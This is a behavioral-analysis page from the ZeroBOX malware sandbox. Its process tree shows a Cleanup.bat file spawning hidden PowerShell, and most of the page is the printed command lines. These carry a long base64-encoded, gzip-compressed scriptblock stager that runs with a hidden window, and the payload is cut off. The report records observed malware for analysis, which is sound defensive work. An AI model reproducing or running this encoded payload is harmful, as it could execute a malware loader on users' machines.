popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "lqDS" C:\Users\test22\AppData\Local\Temp\Cleanup.bat

    1648

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Cleanup.bat

      2064

      • cmd.exe C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATABJAFQAYgBtAFEAQwBBADcAVgBYAGIAVwAvAGEAUwBCAEQAKwBYAHEAbgAvAHsAMQB9AGEAcQBRAE0AQwBvAEIAOAA1AEsARQBWAEsAcAAwAGEAewAxAH0AZwB2AEsAZQBiAE4AeABnADcAaAAwAEcAbABqAEwAMgBaAGgANwBTAFgAMgBHAGsASgA3AC8AZQA4ADMAaQAzAEcAVABYAHAATwA3ADMAawBtADEAWgBPAEgAZABuAFoAbQBkAGYAZQBhAFoAbQBXAFcAWgBoAEsANgBnAFAARgBUADgAMwB1AGQATAA1AGMAdgBiAE4AOAByAHAARwBlAEUASQBCADQAcQBhAGUANwBpAHMAVgBQADIAaQBrAGwAdQBSAHsAMQB9AHQATgBpAGoAcABOAFoAWABmAG0AbwBxAEgATwAwADMAYgBaADQAZwBHAG0ANAArAFAAQwBoAG0AVQBRAFIAQwBVAFUANgBMAG4AVwBJAFEASABGAE0AZwBuAHQARwBTAGEAewAxAH0AVwBsAEQAOABWAFoAMABVAGkAYwBqAGEAOABYAHgATgBYAEsARgArAFUAMwBCACsAbABEAHUAUAAzAG0ASgAzAEUARABrADMAcwByAG8AaAB5AGgAawBKAFAAcgB2AFcANQBpADYAVgBuAEoAWABQAEwAcQBGAEQAegB2AC8AKwBlACcAJwArACcAJwBMADgAegBQAEsAbwB2AFMAewAwAH0AVQBPAEMAVwBhAHoAbQB6AFUATQBzAFMARgBEAHkARwBNAHMAWABsAEsAOABGAHUAYQAnACcAKwAnACcARgAxADIAQgBJADEAYgAxAEEAMwAnACcAKwAnACcANABqAEYAZgBpAHAASgBEAHsAMQB9ADEAcQAxAE4AQQAxAGoAdgBDAFEARABzAEwAWQBqAEIAaABFAHIANwBzAFYANQBPAE0AegBUAGMAUwBJAGkAawBpAGgATQBUAHkAWABOAHAARQBKAHEAJwAnACsAJwAnAEgAagA1AEgARQBYAGUAUgA1ADAAVQBrAGoAdgBOAEYAWgBTADQAMwBtAEMAOABXAHYANgBuAHoAMAArADYAVABKAEIAUQAwAEkASwBWAGUASwBFAGoARQB0AHkAYQBKAGQAdABRAGwAYwBhAG0ATABRADQAKwBSAEMAVgBrAHUAUQBNAHMAVQBFAFEAMwB7ADAAfQBSAGEARQBBAFkAagB1ACsASQBXAG8AdQBUAEIAZwByAEsAdgAvAEYAagBEAG8AZwArAHsAMQB9AHkANwBuADEAVgBTAG4AeQB1AEIAMQBFAGgARQBoAFMATABFAHsAMAB9AEkAVgB6AEcAdAB4AEwARwBFAGsAJwAnACsAJwAnADEAOAB5ADgANABtAHYASwBnAEEARQAvAEsAQgBjAEQAdgBxADQAUgB7ADEAfQBtAGYARQBIAGoAeQAzAHgAQQBuACsAZQBKAHIASgBuAGYAbAB7ADEAfQBoADQATABJADYANABqAEUAewAwAH0ASwBuAHsAMAB9AFUAdABLAEoAaQB7ADEAfQBPAFoAWQA4AE8AZwBBAHsAMQB9ADUAewAxAH0AVgBKAGEAUwB7ADEAfQArAEEAJwAnACsAJwAnAGEANABrAGwAcwBIAHgAWgArADEAVgBjAGsAVQBRAFUAMgBzADgAUwBWAE0AegBXADEATwB2AGMAVwBUAGcAZQAvAEMAbgAvAHYAYwB2AHEAbAArAGsAbABLAHYAcwA3AGwARgBsAGoAUQBrAHIAVQBPAEkAQQArAHAAbQBoAEYAVgBmAEMAZwBwAFoATQBuAEsARQBwAEoAUwBKAEQAYwBCAEYATgBYAHsAMAB9AGEASQBGADYATABNAE8ASgBqAEkAVwBHAFcAMwBQAGgAQgA3AFQAcQBnADQAcAB1AHUAbgBsAEQAbQBrAFEAaQA1AEUATgAnACcAKwAnACcAZwBZAHYASQBLAFkARgA3ADUAMwBKAG8AMgBjAG0AdQArAEYAQgBnAGsAQQB2AFgAUQBNAFoATQAwAHQASQBVADEASQBKAG4AMQBLAGoAVQBPADIAdQB4AHkARABVAEwANwBKAGMAQgB7ADEAfQBYAGwAVgBFAEMAZQBlAG8AVwBGAFoATgBnAFIAcgB5AGkAZwBzAEsAWQBuAHAAWgBRAEkAdgBqAHgATQAvAC8AawByAHAARQB7ADEAfQBRAFYAMABjAGkAOAB6AGMAbwB2AEIAMwBQAEUALwA3AE4AbgBrAFkAaQB5AGgAeABJAGIAQwBBAGcAVwBWAHUAaQBVAHMAeABrADUAQQBVAGwAUwA3ADEAaQBIADQAewAxAH0AcQBaAC8AdABuADMAOABSAGsAJwAnACsAJwAnAEMAWgBtAEQAUABJAEgATABPADAAZwBJAEQAQQBqAGcAVABDAEYAcABFAHMARQByAGcASQAxAEMAaQBXAFQAaQBGADYAewAxAH0AWgBTAFEAQQBpAFcAUABaAGEAJwAnACsAJwAnAEQAUABzAFEANQBFADQANQBjAGkAUgBYAGQAZwBuAFgAdgA0ADEAUAA3AE4AYwBTAEkAawB2AGsAYwBrAGcAZQBlAFkAbABoAE4AdABrAFgAQgBRAFYAbQAwAFkAQwBxAHAAQgBFAFcAVABMAHMAZgB6AGoAeABZAC8AVgBKAHYAVwBsAEcANQAnACcAKwAnACcAQgBRAGQATgBjAHUAeAB1AFgANABRAE0AZwBsAHkAMgA1AHYAVgB1AGEAVABwAEMAYQBJAGoASQBKAEUAQQBNAE4AbwBSAEQAMwBRAGMAJwAnACsAJwAnAGsANAB0ADYAVwBtAHIAVQBkACsAVQBoAEgAUwBGADQAWgBxADIAdQBTAFkAbQB7ADAAfQBvAFoAWABlAEgAbAA0AEQAMwBxAG0AeABmAE4AewAwAH0AMwBxAFQAOABTAEcAZwA4AE0AdAB4AG0AUABPAHUAMABHAG8AbgB0AC8ANwB6AFkARwB5AFAAVgB1AFAASABKAGwAZwB0AHkAWQBhAHIAMABHADgAdgBSAGIAcQB1AG4AMQBsAGEAdAByAEYAdQByAEMAbgBEACsAagBGAGQAewAwAH0ASAAzAG0AQwA4AGMAcABrADIAYQBuAFgATAA1AGkAegBXADYATAA3AHIAUwBGAHUAcABEAGIAZABlADcAewAwAH0ANQBxAHEARgBhAHIARAAyAHYAYQBCAHUAQwBUAE8AaAB2AFEAQwBlAGoAKwBzAFEALwBmAFUARgBPAEgAZgBiADAAWAA2ADEAcQBQAFgAZAA4ADAASgAvAGQATwAnACcAKwAnACcAdABYADMAbgBzAEcANgA1ADMAbAA0ACcAJwArACcAJwB0AEgAUgA2AGIARgA3AE4AVwB1AFYAeQArACcAJwArACcAJwA4AG4ARABuAG4ASABsAEkANQAnACcAKwAnACcAMQA2AFYASgBkAGkAZQBjAEsAdgByAEIAbgBxADUAYgBCAHUAZQBzAEsAYQBWAGcAVABWAHsAMAB9AHYAegBxAGUAMAAzAEsAdQBMAHIARAB6AEcATQAvAE0AUgBxAFcALwBSAHYANgBuAHQAcgBlAHsAMAB9AEQAeQBZADcAcgAyAGIANABGAGgAdgA3AGgAbwBVAFMAbwB4AFgANwBOAHQAZwBaAHIATQBlAFgAdgBhADUAZgBIAGMARABZAEQAVwBjAFgAUQA4AHQATgBqAE8AYgBHAG4AMQBUAHQATgBhADQAMgBkAHMAWQBhAFAAUgBvAHQAKwBWADcANwBrADQAQQBkADcAcAB5ADcASABXAGsAMgB6AGcAZQBIACsAaAA1ADEALwBBAHMANwBEAE0ATAB5AGwAVwAxAE4AcQA3AHsAMQB9AEYAUABuAEMAaQAxAHgARQBhADAAcAAzADAAbwAxADgAZABDAEwAcwB5AEMAZQA2ADcAawAvAFgAWQBhAFkAYwBEADYAKwAnACcAKwAnACcAWQBCAEIAegBlAHoARwBXAHMALwB6AHEAYgB0AHkAYQBUAGwAMQA4ADMATwBhAHUAUQBpAGYAWQB6AGIANQBDAFoAcwAzAEoAYwByAHMANwBBAHoAcgBmAHIASQBTAE8AaQAxAFAASgBOAGQARwBUAGgANABLAE8AegArAGUAbABlAHUAMwBOADAAewAwAH0ATgBOAGsAVgB7ADAAfQAxAHMARwBRAHIAMwBRAHgALwA1AGsAagBGAGQAWABEAHUANwBhAG4AWgBDAEQAcgBqADIAUQBPAEQAJwAnACsAJwAnAGkANABxAFgAVQA2AFgAWgBDAGYAMwBTAEoAdgBNAHUARgBVAEIALwBuAE8ANgByAHIAUgB1ACcAJwArACcAJwB2AFgAQgAxADUASABuADEAJwAnACsAJwAnAHIAZwBsAEgAZQB4AHMARQBVAFoAbwBqAEEAQgBUAGUAQgBGAHEARAA3AGoAegBhAFcASwBkAEwAOAB2ADIAQgB2AGEAbQB4AEwAdQBGAGQAUgAvAFcATABEAHYAewAxAH0AZwBlADAAJwAnACsAJwAnAGgATABWADgANQA3AFgAMwBYAEcAdABHAHsAMAB9AHEAKwAvAHIAWQBKAC8AWQBzADMAMgBsAHoARABGAEUAcQBQAHoANQArAHQAewAxAH0ANAAxAEIAOABOAGkAZQBFAGEAMQBmAHYAcgBhADIAMgBJAG0AcABlAE4AdgBrAFAAdABnAEsATQBwAHgATwBvAGQARQBIAGsAKwBwAGEARwBvAFYAUgBjADUAZgBIADUARABSAHIATABnAHYAMwAyAFQAKwA2AHgAWAArAGYAZwBaAG8AVgB7ADAAfQByAGEAQQBhAE8ANABoAFYAbQBRAEgAVABvAFYARgBuAEYAYQBmAE8AbwBmAFcAbwArAEkAMAA2AGwAaABxAG8AZQBMAHoARQBiAEUAbwBXAEUAUQBkACsASABtADAARwBXAHEASQBnAHgANwBzAHIAZQBkADIAeABUADAASABmAFQAYgBpAGkAYgA4ADcAUgAzAGQATwB5AGwAcgA0AEwAeQBUAGIARAB7ADEAfQAxAEIATwB6AHEAUQAnACcAKwAnACcAOABmADcAcwBCAEwAUwBIADIAWgBsAHEAVQArAEMAWAAyAHgASwBtAHEAUABOAFUAMgBEAFoAcQBZAHsAMAB9AGEAdgBWAGoAbAAnACcAKwAnACcAdgAvADgAMgBaAHAAOABlADEAQwBQAHgAbwBxAHkASABhAGIAbwBaAE8AYgBaADAAVAB4AFkAcABFAHQARgBWAFgAOAB7ADAAfQBZAEgARAB2AEUAVgBCACsAWAA0AGYAcwBOAGYAUgBnADcAewAxAH0AMgBVAFMAeQBqAGYAYQBRADIAVABHAE8AcQBjAHMAKwBjAEkAWgBrAGYANwBSAG8AcgBuAEMAQQBKADAARgBUAGoAKwBYAEYANQA2AFUAcgBhAEEAagBUAFAAeQBBAEoAVgBXADMAZwBtAGUAMwB6AEYAeQA3AHEAYgAyAGEAKwBsAHoAcQBzAFkAcgArAFAASAArAGoAVAA1AFAAYwAvACsAewAxAH0AKwBsAE8AVQAwAG8AbwBuAGgASAA2AFkALwAzADcAaQBXAFMALwA3AGgAUgBnADQAbQBBAHEAUQBOAEsARwB2AE0ASgBKAGUAZABsADYARwA0AHAAUQAwAHoAKwBJAE0AOABZAEcATQBXAEoANABlACsAUgB7ADAAfQBnAG0ASQBpAHoAQQBkAHsAMQB9AHAAagA2ADMAdABMADcAYgBmAGgAYgBGAHsAMAB9AEQAQQBBAEEAJwAnACkALQBmACcAJwA5ACcAJwAsACcAJwB3ACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

        2156

        • powershell.exe powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATABJAFQAYgBtAFEAQwBBADcAVgBYAGIAVwAvAGEAUwBCAEQAKwBYAHEAbgAvAHsAMQB9AGEAcQBRAE0AQwBvAEIAOAA1AEsARQBWAEsAcAAwAGEAewAxAH0AZwB2AEsAZQBiAE4AeABnADcAaAAwAEcAbABqAEwAMgBaAGgANwBTAFgAMgBHAGsASgA3AC8AZQA4ADMAaQAzAEcAVABYAHAATwA3ADMAawBtADEAWgBPAEgAZABuAFoAbQBkAGYAZQBhAFoAbQBXAFcAWgBoAEsANgBnAFAARgBUADgAMwB1AGQATAA1AGMAdgBiAE4AOAByAHAARwBlAEUASQBCADQAcQBhAGUANwBpAHMAVgBQADIAaQBrAGwAdQBSAHsAMQB9AHQATgBpAGoAcABOAFoAWABmAG0AbwBxAEgATwAwADMAYgBaADQAZwBHAG0ANAArAFAAQwBoAG0AVQBRAFIAQwBVAFUANgBMAG4AVwBJAFEASABGAE0AZwBuAHQARwBTAGEAewAxAH0AVwBsAEQAOABWAFoAMABVAGkAYwBqAGEAOABYAHgATgBYAEsARgArAFUAMwBCACsAbABEAHUAUAAzAG0ASgAzAEUARABrADMAcwByAG8AaAB5AGgAawBKAFAAcgB2AFcANQBpADYAVgBuAEoAWABQAEwAcQBGAEQAegB2AC8AKwBlACcAJwArACcAJwBMADgAegBQAEsAbwB2AFMAewAwAH0AVQBPAEMAVwBhAHoAbQB6AFUATQBzAFMARgBEAHkARwBNAHMAWABsAEsAOABGAHUAYQAnACcAKwAnACcARgAxADIAQgBJADEAYgAxAEEAMwAnACcAKwAnACcANABqAEYAZgBpAHAASgBEAHsAMQB9ADEAcQAxAE4AQQAxAGoAdgBDAFEARABzAEwAWQBqAEIAaABFAHIANwBzAFYANQBPAE0AegBUAGMAUwBJAGkAawBpAGgATQBUAHkAWABOAHAARQBKAHEAJwAnACsAJwAnAEgAagA1AEgARQBYAGUAUgA1ADAAVQBrAGoAdgBOAEYAWgBTADQAMwBtAEMAOABXAHYANgBuAHoAMAArADYAVABKAEIAUQAwAEkASwBWAGUASwBFAGoARQB0AHkAYQBKAGQAdABRAGwAYwBhAG0ATABRADQAKwBSAEMAVgBrAHUAUQBNAHMAVQBFAFEAMwB7ADAAfQBSAGEARQBBAFkAagB1ACsASQBXAG8AdQBUAEIAZwByAEsAdgAvAEYAagBEAG8AZwArAHsAMQB9AHkANwBuADEAVgBTAG4AeQB1AEIAMQBFAGgARQBoAFMATABFAHsAMAB9AEkAVgB6AEcAdAB4AEwARwBFAGsAJwAnACsAJwAnADEAOAB5ADgANABtAHYASwBnAEEARQAvAEsAQgBjAEQAdgBxADQAUgB7ADEAfQBtAGYARQBIAGoAeQAzAHgAQQBuACsAZQBKAHIASgBuAGYAbAB7ADEAfQBoADQATABJADYANABqAEUAewAwAH0ASwBuAHsAMAB9AFUAdABLAEoAaQB7ADEAfQBPAFoAWQA4AE8AZwBBAHsAMQB9ADUAewAxAH0AVgBKAGEAUwB7ADEAfQArAEEAJwAnACsAJwAnAGEANABrAGwAcwBIAHgAWgArADEAVgBjAGsAVQBRAFUAMgBzADgAUwBWAE0AegBXADEATwB2AGMAVwBUAGcAZQAvAEMAbgAvAHYAYwB2AHEAbAArAGsAbABLAHYAcwA3AGwARgBsAGoAUQBrAHIAVQBPAEkAQQArAHAAbQBoAEYAVgBmAEMAZwBwAFoATQBuAEsARQBwAEoAUwBKAEQAYwBCAEYATgBYAHsAMAB9AGEASQBGADYATABNAE8ASgBqAEkAVwBHAFcAMwBQAGgAQgA3AFQAcQBnADQAcAB1AHUAbgBsAEQAbQBrAFEAaQA1AEUATgAnACcAKwAnACcAZwBZAHYASQBLAFkARgA3ADUAMwBKAG8AMgBjAG0AdQArAEYAQgBnAGsAQQB2AFgAUQBNAFoATQAwAHQASQBVADEASQBKAG4AMQBLAGoAVQBPADIAdQB4AHkARABVAEwANwBKAGMAQgB7ADEAfQBYAGwAVgBFAEMAZQBlAG8AVwBGAFoATgBnAFIAcgB5AGkAZwBzAEsAWQBuAHAAWgBRAEkAdgBqAHgATQAvAC8AawByAHAARQB7ADEAfQBRAFYAMABjAGkAOAB6AGMAbwB2AEIAMwBQAEUALwA3AE4AbgBrAFkAaQB5AGgAeABJAGIAQwBBAGcAVwBWAHUAaQBVAHMAeABrADUAQQBVAGwAUwA3ADEAaQBIADQAewAxAH0AcQBaAC8AdABuADMAOABSAGsAJwAnACsAJwAnAEMAWgBtAEQAUABJAEgATABPADAAZwBJAEQAQQBqAGcAVABDAEYAcABFAHMARQByAGcASQAxAEMAaQBXAFQAaQBGADYAewAxAH0AWgBTAFEAQQBpAFcAUABaAGEAJwAnACsAJwAnAEQAUABzAFEANQBFADQANQBjAGkAUgBYAGQAZwBuAFgAdgA0ADEAUAA3AE4AYwBTAEkAawB2AGsAYwBrAGcAZQBlAFkAbABoAE4AdABrAFgAQgBRAFYAbQAwAFkAQwBxAHAAQgBFAFcAVABMAHMAZgB6AGoAeABZAC8AVgBKAHYAVwBsAEcANQAnACcAKwAnACcAQgBRAGQATgBjAHUAeAB1AFgANABRAE0AZwBsAHkAMgA1AHYAVgB1AGEAVABwAEMAYQBJAGoASQBKAEUAQQBNAE4AbwBSAEQAMwBRAGMAJwAnACsAJwAnAGsANAB0ADYAVwBtAHIAVQBkACsAVQBoAEgAUwBGADQAWgBxADIAdQBTAFkAbQB7ADAAfQBvAFoAWABlAEgAbAA0AEQAMwBxAG0AeABmAE4AewAwAH0AMwBxAFQAOABTAEcAZwA4AE0AdAB4AG0AUABPAHUAMABHAG8AbgB0AC8ANwB6AFkARwB5AFAAVgB1AFAASABKAGwAZwB0AHkAWQBhAHIAMABHADgAdgBSAGIAcQB1AG4AMQBsAGEAdAByAEYAdQByAEMAbgBEACsAagBGAGQAewAwAH0ASAAzAG0AQwA4AGMAcABrADIAYQBuAFgATAA1AGkAegBXADYATAA3AHIAUwBGAHUAcABEAGIAZABlADcAewAwAH0ANQBxAHEARgBhAHIARAAyAHYAYQBCAHUAQwBUAE8AaAB2AFEAQwBlAGoAKwBzAFEALwBmAFUARgBPAEgAZgBiADAAWAA2ADEAcQBQAFgAZAA4ADAASgAvAGQATwAnACcAKwAnACcAdABYADMAbgBzAEcANgA1ADMAbAA0ACcAJwArACcAJwB0AEgAUgA2AGIARgA3AE4AVwB1AFYAeQArACcAJwArACcAJwA4AG4ARABuAG4ASABsAEkANQAnACcAKwAnACcAMQA2AFYASgBkAGkAZQBjAEsAdgByAEIAbgBxADUAYgBCAHUAZQBzAEsAYQBWAGcAVABWAHsAMAB9AHYAegBxAGUAMAAzAEsAdQBMAHIARAB6AEcATQAvAE0AUgBxAFcALwBSAHYANgBuAHQAcgBlAHsAMAB9AEQAeQBZADcAcgAyAGIANABGAGgAdgA3AGgAbwBVAFMAbwB4AFgANwBOAHQAZwBaAHIATQBlAFgAdgBhADUAZgBIAGMARABZAEQAVwBjAFgAUQA4AHQATgBqAE8AYgBHAG4AMQBUAHQATgBhADQAMgBkAHMAWQBhAFAAUgBvAHQAKwBWADcANwBrADQAQQBkADcAcAB5ADcASABXAGsAMgB6AGcAZQBIACsAaAA1ADEALwBBAHMANwBEAE0ATAB5AGwAVwAxAE4AcQA3AHsAMQB9AEYAUABuAEMAaQAxAHgARQBhADAAcAAzADAAbwAxADgAZABDAEwAcwB5AEMAZQA2ADcAawAvAFgAWQBhAFkAYwBEADYAKwAnACcAKwAnACcAWQBCAEIAegBlAHoARwBXAHMALwB6AHEAYgB0AHkAYQBUAGwAMQA4ADMATwBhAHUAUQBpAGYAWQB6AGIANQBDAFoAcwAzAEoAYwByAHMANwBBAHoAcgBmAHIASQBTAE8AaQAxAFAASgBOAGQARwBUAGgANABLAE8AegArAGUAbABlAHUAMwBOADAAewAwAH0ATgBOAGsAVgB7ADAAfQAxAHMARwBRAHIAMwBRAHgALwA1AGsAagBGAGQAWABEAHUANwBhAG4AWgBDAEQAcgBqADIAUQBPAEQAJwAnACsAJwAnAGkANABxAFgAVQA2AFgAWgBDAGYAMwBTAEoAdgBNAHUARgBVAEIALwBuAE8ANgByAHIAUgB1ACcAJwArACcAJwB2AFgAQgAxADUASABuADEAJwAnACsAJwAnAHIAZwBsAEgAZQB4AHMARQBVAFoAbwBqAEEAQgBUAGUAQgBGAHEARAA3AGoAegBhAFcASwBkAEwAOAB2ADIAQgB2AGEAbQB4AEwAdQBGAGQAUgAvAFcATABEAHYAewAxAH0AZwBlADAAJwAnACsAJwAnAGgATABWADgANQA3AFgAMwBYAEcAdABHAHsAMAB9AHEAKwAvAHIAWQBKAC8AWQBzADMAMgBsAHoARABGAEUAcQBQAHoANQArAHQAewAxAH0ANAAxAEIAOABOAGkAZQBFAGEAMQBmAHYAcgBhADIAMgBJAG0AcABlAE4AdgBrAFAAdABnAEsATQBwAHgATwBvAGQARQBIAGsAKwBwAGEARwBvAFYAUgBjADUAZgBIADUARABSAHIATABnAHYAMwAyAFQAKwA2AHgAWAArAGYAZwBaAG8AVgB7ADAAfQByAGEAQQBhAE8ANABoAFYAbQBRAEgAVABvAFYARgBuAEYAYQBmAE8AbwBmAFcAbwArAEkAMAA2AGwAaABxAG8AZQBMAHoARQBiAEUAbwBXAEUAUQBkACsASABtADAARwBXAHEASQBnAHgANwBzAHIAZQBkADIAeABUADAASABmAFQAYgBpAGkAYgA4ADcAUgAzAGQATwB5AGwAcgA0AEwAeQBUAGIARAB7ADEAfQAxAEIATwB6AHEAUQAnACcAKwAnACcAOABmADcAcwBCAEwAUwBIADIAWgBsAHEAVQArAEMAWAAyAHgASwBtAHEAUABOAFUAMgBEAFoAcQBZAHsAMAB9AGEAdgBWAGoAbAAnACcAKwAnACcAdgAvADgAMgBaAHAAOABlADEAQwBQAHgAbwBxAHkASABhAGIAbwBaAE8AYgBaADAAVAB4AFkAcABFAHQARgBWAFgAOAB7ADAAfQBZAEgARAB2AEUAVgBCACsAWAA0AGYAcwBOAGYAUgBnADcAewAxAH0AMgBVAFMAeQBqAGYAYQBRADIAVABHAE8AcQBjAHMAKwBjAEkAWgBrAGYANwBSAG8AcgBuAEMAQQBKADAARgBUAGoAKwBYAEYANQA2AFUAcgBhAEEAagBUAFAAeQBBAEoAVgBXADMAZwBtAGUAMwB6AEYAeQA3AHEAYgAyAGEAKwBsAHoAcQBzAFkAcgArAFAASAArAGoAVAA1AFAAYwAvACsAewAxAH0AKwBsAE8AVQAwAG8AbwBuAGgASAA2AFkALwAzADcAaQBXAFMALwA3AGgAUgBnADQAbQBBAHEAUQBOAEsARwB2AE0ASgBKAGUAZABsADYARwA0AHAAUQAwAHoAKwBJAE0AOABZAEcATQBXAEoANABlACsAUgB7ADAAfQBnAG0ASQBpAHoAQQBkAHsAMQB9AHAAagA2ADMAdABMADcAYgBmAGgAYgBGAHsAMAB9AEQAQQBBAEEAJwAnACkALQBmACcAJwA5ACcAJwAsACcAJwB3ACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

          2240

          • powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIALITbmQCA7VXbW/aSBD+Xqn/{1}aqQMCoB85KEVKp0a{1}gvKebNxg7h0GljL2Zh7SX2GkJ7/e83i3GTXpO73km1ZOHdnZmdfeaZmWWZhK6gPFT83udL5cvbN8rpGeEIB4qae7isVP2ikluR{1}tNijpNZXfmoqHO03bZ4gGm4+PChmUQRCUU6LnWIQHFMgntGSa{1}WlD8VZ0Uicja8XxNXKF+U3B+lDuP3mJ3EDk3srohyhkJPrvW5i6VnJXPLqFDzv/+e'+'L8zPKovS{0}UOCWazmzUMsSFDyGMsXlK8Fua'+'F12BI1b1A3'+'4jFfipJD{1}1q1NA1jvCQDsLYjBhEr7sV5OMzTcSIikihMTyXNpEJq'+'Hj5HEXeR50UkjvNFZS43mC8Wv6nz0+6TJBQ0IKVeKEjEtyaJdtQlcamLQ4+RCVkuQMsUEQ3{0}RaEAYju+IWouTBgrKv/FjDog+{1}y7n1VSnyuB1EhEhSLE{0}IVzGtxLGEk'+'18y84mvKgAE/KBcDvq4R{